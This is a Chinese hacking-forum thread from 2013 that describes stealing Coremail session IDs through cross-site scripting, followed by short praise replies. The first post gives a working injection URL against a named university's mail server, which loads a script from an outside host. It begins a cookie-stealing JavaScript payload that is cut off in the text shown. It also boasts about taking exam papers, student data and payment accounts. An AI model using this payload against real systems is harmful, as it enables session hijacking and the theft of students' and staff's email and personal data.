查看: 1553|回复: 25

用xss黑掉coremail的sid

[复制链接]
发表于 2013-2-19 10:24:51 | 显示全部楼层 |阅读模式

浏览器的bypass我就不说了 我的方法在IE8下无法实现的.
1、首先在http://mail.bnu.edu.cn/coremail/forgetpwd1.jsp?
uid=%22%3E%3Cscript%20src=http://files.cnblogs.com/xsser/coremail.js%3E%3C/script%3E
注入自己的代码。

2、比如

因为在coremail里 验证是靠sid来进行的。但是sid是写在链接里的 当然cookie里也有个叫coremail.sid。。。。呵呵呵
其实coremail作为各大高校常用的mail系统。其csrf也是比较都的,搞定mail就可以搞定试卷…全校数据信息…各种*&……#@! 你懂的!要是能刷个支付宝啥的 钱虽然比较少,但是全部搞起来的话也够你大学4年白吃白喝了,不过这个是非法的事情,注意刑法的修改条例了。
然后加载的js为:
var my_post = "";
var b,c,d,mail_cookies;
var xhr;
document.write("


发表于 2013-2-19 15:05:04 | 显示全部楼层
好帖,有才  
发表于 2013-2-20 17:08:25 | 显示全部楼层
我帮你 喝喝  
发表于 2013-2-21 07:01:34 | 显示全部楼层
这个贴不错!!!!!  
发表于 2013-2-25 21:05:45 | 显示全部楼层
鉴定完毕.!  
发表于 2013-3-1 01:27:53 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-12-4 06:12:02 | 显示全部楼层
发贴看看自己积分  
发表于 2014-12-26 23:04:59 | 显示全部楼层
顶一个先  
发表于 2015-1-27 05:16:07 | 显示全部楼层
(*^__^*) 嘻嘻……   
发表于 2015-3-1 03:25:36 | 显示全部楼层
(*^__^*) 嘻嘻……  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则